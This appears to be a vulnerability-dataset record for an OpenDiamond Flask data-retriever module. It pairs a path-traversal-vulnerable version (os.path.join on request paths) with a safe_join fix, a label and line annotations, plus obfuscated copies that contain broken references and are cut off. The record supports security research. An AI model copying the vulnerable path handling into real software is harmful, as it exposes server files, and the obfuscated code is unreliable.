# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from opendiamond.dataretriever.test_utils import *
BASEURL = 'cocktailtest'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = '/srv/diamond/STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('test_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
classes=None, start=0, limit=-1):
mixer_list = get_mixer_list(mixeridx, classes)
start_idx = int((index-1)*(1.0/total)*len(mixer_list))
end_idx = int(index*(1.0/total)*len(mixer_list))
mixer_list = mixer_list[start_idx:end_idx]
_log.info("Mixer Size {}".format(len(mixer_list)))
sys.stdout.flush()
return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
_log.info("Enter Scope baseIdx {}".format(baseidx))
sys.stdout.flush()
base_list = []
seed = None
percentage = 0.
if params:
seed, percentage = decode_params(params)
s_seed = seed
if s_seed == None:
s_seed = random.randrange(10000)
if baseidx != "0":
# format of baseidx: stream_inat
# format of base file: stream_{int: seed}_{float(.2f): baserate}
base_index = _get_index_absolute_path(baseidx)
data_type, pos_file = base_index.split('_')
# index[-1] = str("{:.2f}".format(index[-1])) # to ensure there is exactly two decial places
# if seed != s_seed:
# index[1] = str(s_seed)
# base_index = '_'.join(index)
base_list = [data_type, str(s_seed), pos_file, "{:.2f}".format(percentage)]
base_index = '_'.join(base_list)
print(base_index)
if not os.path.exists(base_index):
split_data(INDEXDIR, percentage, s_seed)
#base_index = base_index.replace(str(seed),str(s_seed))
with open(base_index, 'r') as f:
base_list = list(f.readlines())
if start > 0:
base_list = base_list[start:]
if limit > 0:
end_ = len(base_list)
if limit > end_:
limit = end_
base_list = base_list[:limit]
total_entries = len(base_list)
make_cocktail = bool(mixer_list and base_list)
if base_list:
total_entries = len(base_list) #base_entries
else:
total_entries = len(mixer_list)
base_list = mixer_list.copy()
del mixer_list
random.seed(seed)
#random.Random(seed).shuffle(base_list)
total_sample = 0
if make_cocktail:
random.Random(seed).shuffle(mixer_list)
total_sample = int(percentage*total_entries)
total_entries = total_entries + total_sample
# Streaming response:
# http://flask.pocoo.org/docs/0.12/patterns/streaming/
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
mix_per_iteration = 0
iteration_count = 0
if make_cocktail:
mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
pool = cycle(mixer_list)
mix_indices = []
def generate_mix_indices():
random.seed(seed)
return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
for count in range(total_entries):
if not count % ITEMS_PER_ITERATION and make_cocktail:
mix_indices = generate_mix_indices()
iteration_count += 1
if count in mix_indices:
obj_path = next(pool).strip()
else:
obj_path = base_list.pop(0).strip()
yield _get_object_element(object_path=obj_path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
keywords = params.split('_')
m_type = keywords[0]
seed = int(keywords[1])
percentage = 0.1
if m_type == 'r':
seed = None
if len(keywords) > 2:
percentage = float(keywords[2]) #float(keywords[2])/100.
return seed, round(percentage, 4)
def get_mixer_list(idx, classes=None):
"""
Return list of file paths present in given classes of mixer set
If class list is None or incorrect then return list of entire mixer set.
Args:
classes (str): Comma seperated classes of interest
idx (str): Index of mixer collection
Returns:
"""
mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
image_types = ('*.jpg', '*.JPG', '*.jpeg', '.png')
classes_list = []
if classes:
classes.replace('%2C', ',')
classes.replace('%20', ' ')
classes_list = classes.split(',')
def get_class_path():
with open(mixer_index, 'r') as f:
dataset_path = f.readline()
dataset_path = '/'.join(dataset_path.split('/')[:-2])
class_paths = []
for c in classes_list:
class_paths.append(_get_obj_absolute_path(dataset_path+'/'+c.strip()))
return class_paths
mixer_list = []
class_paths = get_class_path()
_log.info("Class paths : {}".format(class_paths))
if class_paths:
for path in class_paths:
_log.info("Path Exists ? {}".format(os.path.exists(path)))
sys.stdout.flush()
file_list = []
for ext in image_types:
file_list.extend(glob.glob(os.path.join(path, ext)))
mixer_list.extend(sorted(file_list))
mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
else:
with open(mixer_index, 'r') as f:
mixer_list = list(f.readlines())
return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
path = _get_obj_absolute_path(object_path)
attrs = dict()
try:
attrs['_gt_label'] = path.split('/')[-2]
except IOError:
pass
return jsonify(attrs)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
class_text = '/'.join(path.split('/')[:-2])+'/classes.txt'
if os.path.isfile(class_text):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', object_path=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_path(obj_path):
return obj_path.replace(DATAROOT+'/', '')
def _get_obj_absolute_path(obj_path):
return os.path.join(DATAROOT, obj_path)
def _get_index_absolute_path(index):
return os.path.join(INDEXDIR, index)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.test_utils import *
BASEURL = 'cocktailtest'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = '/srv/diamond/STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('test_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
classes=None, start=0, limit=-1):
mixer_list = get_mixer_list(mixeridx, classes)
start_idx = int((index-1)*(1.0/total)*len(mixer_list))
end_idx = int(index*(1.0/total)*len(mixer_list))
mixer_list = mixer_list[start_idx:end_idx]
_log.info("Mixer Size {}".format(len(mixer_list)))
sys.stdout.flush()
return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
_log.info("Enter Scope baseIdx {}".format(baseidx))
sys.stdout.flush()
base_list = []
seed = None
percentage = 0.
if params:
seed, percentage = decode_params(params)
s_seed = seed
if s_seed == None:
s_seed = random.randrange(10000)
if baseidx != "0":
# format of baseidx: stream_inat
# format of base file: stream_{int: seed}_{float(.2f): baserate}
base_index = _get_index_absolute_path(baseidx)
data_type, pos_file = base_index.split('_')
# index[-1] = str("{:.2f}".format(index[-1])) # to ensure there is exactly two decial places
# if seed != s_seed:
# index[1] = str(s_seed)
# base_index = '_'.join(index)
base_list = [data_type, str(s_seed), pos_file, "{:.2f}".format(percentage)]
base_index = '_'.join(base_list)
print(base_index)
if not os.path.exists(base_index):
split_data(INDEXDIR, percentage, s_seed)
#base_index = base_index.replace(str(seed),str(s_seed))
with open(base_index, 'r') as f:
base_list = list(f.readlines())
if start > 0:
base_list = base_list[start:]
if limit > 0:
end_ = len(base_list)
if limit > end_:
limit = end_
base_list = base_list[:limit]
total_entries = len(base_list)
make_cocktail = bool(mixer_list and base_list)
if base_list:
total_entries = len(base_list) #base_entries
else:
total_entries = len(mixer_list)
base_list = mixer_list.copy()
del mixer_list
random.seed(seed)
#random.Random(seed).shuffle(base_list)
total_sample = 0
if make_cocktail:
random.Random(seed).shuffle(mixer_list)
total_sample = int(percentage*total_entries)
total_entries = total_entries + total_sample
# Streaming response:
# http://flask.pocoo.org/docs/0.12/patterns/streaming/
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
mix_per_iteration = 0
iteration_count = 0
if make_cocktail:
mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
pool = cycle(mixer_list)
mix_indices = []
def generate_mix_indices():
random.seed(seed)
return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
for count in range(total_entries):
if not count % ITEMS_PER_ITERATION and make_cocktail:
mix_indices = generate_mix_indices()
iteration_count += 1
if count in mix_indices:
obj_path = next(pool).strip()
else:
obj_path = base_list.pop(0).strip()
yield _get_object_element(object_path=obj_path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
keywords = params.split('_')
m_type = keywords[0]
seed = int(keywords[1])
percentage = 0.1
if m_type == 'r':
seed = None
if len(keywords) > 2:
percentage = float(keywords[2]) #float(keywords[2])/100.
return seed, round(percentage, 4)
def get_mixer_list(idx, classes=None):
"""
Return list of file paths present in given classes of mixer set
If class list is None or incorrect then return list of entire mixer set.
Args:
classes (str): Comma seperated classes of interest
idx (str): Index of mixer collection
Returns:
"""
mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
image_types = ('*.jpg', '*.JPG', '*.jpeg', '.png')
classes_list = []
if classes:
classes.replace('%2C', ',')
classes.replace('%20', ' ')
classes_list = classes.split(',')
def get_class_path():
with open(mixer_index, 'r') as f:
dataset_path = f.readline()
dataset_path = '/'.join(dataset_path.split('/')[:-2])
class_paths = []
for c in classes_list:
class_paths.append(_get_obj_absolute_path(dataset_path+'/'+c.strip()))
return class_paths
mixer_list = []
class_paths = get_class_path()
_log.info("Class paths : {}".format(class_paths))
if class_paths:
for path in class_paths:
_log.info("Path Exists ? {}".format(os.path.exists(path)))
sys.stdout.flush()
file_list = []
for ext in image_types:
file_list.extend(glob.glob(os.path.join(path, ext)))
mixer_list.extend(sorted(file_list))
mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
else:
with open(mixer_index, 'r') as f:
mixer_list = list(f.readlines())
return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
path = _get_obj_absolute_path(object_path)
attrs = dict()
try:
attrs['_gt_label'] = path.split('/')[-2]
except IOError:
pass
return jsonify(attrs)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
class_text = '/'.join(path.split('/')[:-2])+'/classes.txt'
if os.path.isfile(class_text):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', object_path=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_path(obj_path):
return obj_path.replace(DATAROOT+'/', '')
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
def _get_index_absolute_path(index):
return safe_join(INDEXDIR, index)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
| path_disclosure | {
"code": [
" return os.path.join(DATAROOT, obj_path)",
" return os.path.join(INDEXDIR, index)"
],
"line_no": [
282,
286
]
} | {
"code": [
"from werkzeug.security import safe_join",
" return safe_join(INDEXDIR, index)"
],
"line_no": [
27,
288
]
} |
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from opendiamond.dataretriever.test_utils import *
VAR_0 = 'cocktailtest'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_36, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_30/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = '/srv/diamond/STREAM'
VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('test_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
VAR_8.info("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
VAR_8.info("Enter Scope baseIdx {}".format(VAR_9))
sys.stdout.flush()
VAR_23 = []
VAR_24 = None
VAR_25 = 0.
if VAR_13:
VAR_24, VAR_25 = FUNC_3(VAR_13)
VAR_26 = VAR_24
if VAR_26 == None:
VAR_26 = random.randrange(10000)
if VAR_9 != "0":
VAR_40 = FUNC_11(VAR_9)
VAR_41, VAR_42 = VAR_40.split('_')
VAR_23 = [VAR_41, str(VAR_26), VAR_42, "{:.2f}".format(VAR_25)]
VAR_40 = '_'.join(VAR_23)
print(VAR_40)
if not os.path.exists(VAR_40):
split_data(VAR_3, VAR_25, VAR_26)
with open(VAR_40, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
if VAR_16 > 0:
VAR_48 = len(VAR_23)
if VAR_16 > VAR_48:
VAR_16 = VAR_48
VAR_23 = base_list[:VAR_16]
VAR_43 = len(VAR_23)
VAR_27 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_43 = len(VAR_23) #base_entries
else:
VAR_43 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_28 = 0
if VAR_27:
random.Random(VAR_24).shuffle(VAR_17)
VAR_28 = int(VAR_25*VAR_43)
total_entries = VAR_43 + VAR_28
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_43)
VAR_44 = 0
VAR_45 = 0
if VAR_27:
VAR_44 = int(VAR_25 * VAR_5)
VAR_49 = cycle(VAR_17)
VAR_46 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_45,
sorted(random.sample(list(range(VAR_5)), VAR_44))))
for count in range(VAR_43):
if not count % VAR_5 and VAR_27:
VAR_46 = FUNC_15()
VAR_45 += 1
if count in VAR_46:
VAR_20 = next(VAR_49).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_29=headers)
def FUNC_3(VAR_13):
VAR_30 = VAR_13.split('_')
VAR_31 = VAR_30[0]
VAR_24 = int(VAR_30[1])
VAR_25 = 0.1
if VAR_31 == 'r':
VAR_24 = None
if len(VAR_30) > 2:
VAR_25 = float(VAR_30[2]) #float(VAR_30[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_32 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_33 = ('*.jpg', '*.JPG', '*.jpeg', '.png')
VAR_34 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_34 = VAR_14.split(',')
def FUNC_14():
with open(VAR_32, 'r') as f:
VAR_47 = f.readline()
VAR_47 = '/'.join(VAR_47.split('/')[:-2])
VAR_35 = []
for c in VAR_34:
VAR_35.append(FUNC_10(VAR_47+'/'+c.strip()))
return VAR_35
VAR_17 = []
VAR_35 = FUNC_14()
VAR_8.info("Class paths : {}".format(VAR_35))
if VAR_35:
for VAR_36 in VAR_35:
VAR_8.info("Path Exists ? {}".format(os.path.exists(VAR_36)))
sys.stdout.flush()
VAR_50 = []
for ext in VAR_33:
VAR_50.extend(glob.glob(os.path.join(VAR_36, ext)))
VAR_17.extend(sorted(VAR_50))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_32, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_36:VAR_19>')
def FUNC_5(VAR_19):
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_29=headers)
@VAR_7.route('/meta/<VAR_36:VAR_19>')
def FUNC_6(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_37 = dict()
try:
VAR_37['_gt_label'] = VAR_36.split('/')[-2]
except IOError:
pass
return jsonify(VAR_37)
def FUNC_7(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_38 = '/'.join(VAR_36.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_38):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return os.path.join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return os.path.join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_36:VAR_20>')
def FUNC_12(VAR_20):
VAR_36 = FUNC_10(VAR_20)
VAR_29 = Headers()
VAR_39 = send_file(VAR_36,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_39.headers.extend(VAR_29)
return VAR_39
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.test_utils import *
VAR_0 = 'cocktailtest'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_36, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0/VAR_14/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/VAR_30/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/VAR_30/d_42_1.0
"""
def FUNC_0(VAR_6):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = '/srv/diamond/STREAM'
VAR_4 = VAR_6.dataroot
VAR_7 = Blueprint('test_store', __name__)
VAR_8 = logging.getLogger(__name__)
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>')
@VAR_7.route('/base/<VAR_9>/mixers/<VAR_10>/VAR_30/<VAR_13>/' +
'classes/<VAR_14>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/distrbuted/<int:VAR_11>of<int:VAR_12>/' +
'mixers/<VAR_10>/VAR_30/<VAR_13>/VAR_14/<VAR_14>')
def FUNC_1(VAR_9, VAR_10=None, VAR_11=1, VAR_12=1, VAR_13=None,
VAR_14=None, VAR_15=0, VAR_16=-1):
VAR_17 = FUNC_4(VAR_10, VAR_14)
VAR_21 = int((VAR_11-1)*(1.0/VAR_12)*len(VAR_17))
VAR_22 = int(VAR_11*(1.0/VAR_12)*len(VAR_17))
mixer_list = VAR_17[VAR_21:VAR_22]
VAR_8.info("Mixer Size {}".format(len(VAR_17)))
sys.stdout.flush()
return FUNC_2(VAR_9, VAR_13, VAR_17, VAR_15, VAR_16)
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>')
@VAR_7.route('/base/<VAR_9>/VAR_30/<VAR_13>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
@VAR_7.route('/base/<VAR_9>/VAR_15/<int:VAR_15>/VAR_16/<int:VAR_16>')
def FUNC_2(VAR_9, VAR_13=None, VAR_17=None, VAR_15=0, VAR_16=-1):
VAR_8.info("Enter Scope baseIdx {}".format(VAR_9))
sys.stdout.flush()
VAR_23 = []
VAR_24 = None
VAR_25 = 0.
if VAR_13:
VAR_24, VAR_25 = FUNC_3(VAR_13)
VAR_26 = VAR_24
if VAR_26 == None:
VAR_26 = random.randrange(10000)
if VAR_9 != "0":
VAR_40 = FUNC_11(VAR_9)
VAR_41, VAR_42 = VAR_40.split('_')
VAR_23 = [VAR_41, str(VAR_26), VAR_42, "{:.2f}".format(VAR_25)]
VAR_40 = '_'.join(VAR_23)
print(VAR_40)
if not os.path.exists(VAR_40):
split_data(VAR_3, VAR_25, VAR_26)
with open(VAR_40, 'r') as f:
VAR_23 = list(f.readlines())
if VAR_15 > 0:
VAR_23 = base_list[VAR_15:]
if VAR_16 > 0:
VAR_48 = len(VAR_23)
if VAR_16 > VAR_48:
VAR_16 = VAR_48
VAR_23 = base_list[:VAR_16]
VAR_43 = len(VAR_23)
VAR_27 = bool(VAR_17 and VAR_23)
if VAR_23:
VAR_43 = len(VAR_23) #base_entries
else:
VAR_43 = len(VAR_17)
VAR_23 = VAR_17.copy()
del VAR_17
random.seed(VAR_24)
VAR_28 = 0
if VAR_27:
random.Random(VAR_24).shuffle(VAR_17)
VAR_28 = int(VAR_25*VAR_43)
total_entries = VAR_43 + VAR_28
def FUNC_13():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_43)
VAR_44 = 0
VAR_45 = 0
if VAR_27:
VAR_44 = int(VAR_25 * VAR_5)
VAR_49 = cycle(VAR_17)
VAR_46 = []
def FUNC_15():
random.seed(VAR_24)
return list(map(lambda x: x + VAR_5*VAR_45,
sorted(random.sample(list(range(VAR_5)), VAR_44))))
for count in range(VAR_43):
if not count % VAR_5 and VAR_27:
VAR_46 = FUNC_15()
VAR_45 += 1
if count in VAR_46:
VAR_20 = next(VAR_49).strip()
else:
VAR_20 = VAR_23.pop(0).strip()
yield FUNC_7(VAR_19=VAR_20) + '\n'
yield '</objectlist>\n'
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_13()),
status="200 OK",
VAR_29=headers)
def FUNC_3(VAR_13):
VAR_30 = VAR_13.split('_')
VAR_31 = VAR_30[0]
VAR_24 = int(VAR_30[1])
VAR_25 = 0.1
if VAR_31 == 'r':
VAR_24 = None
